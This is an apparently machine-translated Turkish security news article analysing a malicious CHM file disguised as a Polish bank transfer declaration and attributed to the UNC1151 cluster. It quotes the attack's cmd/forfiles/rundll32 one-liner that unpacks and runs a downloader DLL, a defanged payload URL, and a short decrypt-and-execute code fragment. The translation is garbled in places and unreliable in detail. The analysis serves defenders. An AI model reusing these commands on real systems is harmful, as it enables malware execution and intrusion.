Kötü niyetli bir Microsoft, 30 Haziran 2025 tarihinde Polonya’dan yüklenen HTML Yardım (CHM) dosyasını derledi, eski bir dokümantasyon formatının modern kötü amaçlı yazılımlar için güçlü bir dağıtım aracına nasıl yeniden yerleştirilebileceğini gösterdi.
“DeKlaracja.chm” olarak adlandırılan arşiv, banka transfer beyanı olarak maskelenir ve iyi huylu bir makbuz görüntüsü ile açılır, kurbanları sofistike bir çok aşamalı yükü gizlerken yanlış bir güvenlik duygusuna sokar.
.webp)
Saldırı, Windows’un yürütülebilir (hh.exe) CHM’yi işlediği anı başlar. İçeri gömülü bir şaşkın index.htm JavaScript uzun bir onaltılık leke kodunu çözen, dinamik olarak html yazar ve gizlenmiş bir kabine arşivini sessizce indirir (desktop.mp3) kullanımdan kaldırılan “etiket.
Bu arşiv, gerçek indirici DLL’yi içerir, ancak kullanıcı arayüzünde asla kendine ihanet etmez.
DMPDUMP analistleri, komut dosyasının HTML Yardımı Activex Control (adb880a6-d8ff-11cf-9377-00aa003b7a11) Gizli bir komut zinciri yürütmek, meşru pencereler ikiliden yararlanmak için forfiles.exe Şüpheli ebeveyn-çocuk korelasyonlarından kaçınmak için.
Taktik, karadan (LOTL) istismarda bir eğilimi yansıtır ve saldırganların tamamen yamalı sistemlerde kod yürütülmesine izin verirken birçok davranışsal savunmayı kaldırmasına izin verir.
Raporlar altyapıyı Belarus bağlantılı Frostyneighbor/UNC1151 kümesine bağlarken, kampanyanın pratik tehlikesi gizliliğinde yatıyor.
Polonya varlıklarını hedefleyen, görünüşte eski bir dosya türünün çağdaş uç nokta savunmalarını nasıl delebileceğini, kimlik hırsızlığı, casusluk veya yıkıcı takip işlemlerinin yolunu açabileceğini gösterir.
Odaklanan enfeksiyon mekanizması
ActiveX kontrolü çalıştığında, programlı olarak en aza indirilmiş bir komut istemini ortaya çıkaran hazırlanmış bir düğmeyi tıklar.
Aşağıdaki tek astar-birden fazla kodlama katmanından bir araya getirilmiş-saldırının kalbini görür:-
cmd /min /c forfiles /p %temp% /m *.tmp /c "cmd /c if @fsize==180738 expand @file %temp%\uNT32.dll & rundll32 %temp%\uNT32.dll,#1"Burada, forfiles Yeni indirilenler için avlar .tmp (tam olarak 180.738 bayt). Bulunduğunda, Windows’un Yerli expand Hizmet Paketlerini Çıkarır uNT32.dll Kabine’den ve rundll32 İhracatını arar #1C ++ indiricisini başlatma.
.webp)
Bu DLL, 128 baytlı dönen XOR tuşuyla gömülü ipleri şifreledi, ardından WinHttp kullanır. hxxps://rustyquill[.]top/shw/the-magnus-protoco1.jpg.
JPEG 289.109 baytı aşarsa, bu işaretin ötesindeki her şey net32.dllsaklandı %LocalAppData%\TaskSync\ ve planlanmış bir görev olarak kayıtlı – kayıt defteri yazmadan otomatik kalıcılığı sağlamak.
if(payload_size > 0x46835){
decrypt(buffer + 0x46835, key, decrypted);
SaveAndExecute(decrypted, "TaskSync\\net32.dll");
}Bu zarif basit zincir sayesinde, Legacy dosyalarının Truva atları, kullanıcı arayüzü hileleri, güvenilir Windows ikili dosyaları ve ince ağ trafiğini harmanlamak için birçok güvenlik aracının hala hafife aldığı bir dayanak elde etmesine yardımcı olur.
Canlı bir ortamda kötü amaçlı yazılımları algılayın. Ücretsiz dene